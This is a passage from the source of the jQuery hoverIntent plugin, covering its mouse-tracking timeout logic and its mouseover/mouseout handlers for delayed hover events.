				ob.hoverIntent_s = 1;
				return cfg.over.apply(ob,[ev]);
			} else {
				// set previous coordinates for next time
				pX = cX; pY = cY;
				// use self-calling timeout, guarantees intervals are spaced out properly (avoids JavaScript timer bugs)
				ob.hoverIntent_t = setTimeout( function(){compare(ev, ob);} , cfg.interval );
			}
		};

		// A private function for delaying the mouseOut function
		var delay = function(ev,ob) {
			ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t);
			ob.hoverIntent_s = 0;
			return cfg.out.apply(ob,[ev]);
		};

		// A private function for handling mouse 'hovering'
		var handleHover = function(e) {
			// next three lines copied from jQuery.hover, ignore children onMouseOver/onMouseOut
			var p = (e.type == "mouseover" ? e.fromElement : e.toElement) || e.relatedTarget;
			while ( p && p != this ) { try { p = p.parentNode; } catch(e) { p = this; } }
			if ( p == this ) { return false; }

			// copy objects to be passed into t (required for event object to be passed in IE)
			var ev = jQuery.extend({},e);
			var ob = this;

			// cancel hoverIntent timer if it exists
			if (ob.hoverIntent_t) { ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t); }

			// else e.type == "onmouseover"
			if (e.type == "mouseover") {
				// set "previous" X and Y position based on initial entry point
				pX = ev.pageX; pY = ev.pageY;
				// update "current" X and Y position based on mousemove
				$(ob).bind("mousemove",track);
				// start polling interval (self-calling timeout) to compare mouse coordinates over time
				if (ob.hoverIntent_s != 1) { ob.hoverIntent_t = setTimeout( function(){compare(ev,ob);} , cfg.interval );}

			// else e.type == "onmouseout"
			} else {
				// unbind expensive mousemove event
				$(ob).unbind("mousemove",track);
				// if hoverIntent state is true, then call the mouseOut function after the specified delay
				if (ob.hoverIntent_s == 1) { ob.hoverIntent_t = setTimeout( function(){delay(ev,ob);} , cfg.timeout );}
			}
		};

		// bind the function to the two event listeners
		return this.mouseover(handleHover).mouseout(handleHover);
	};
})(jQuery);
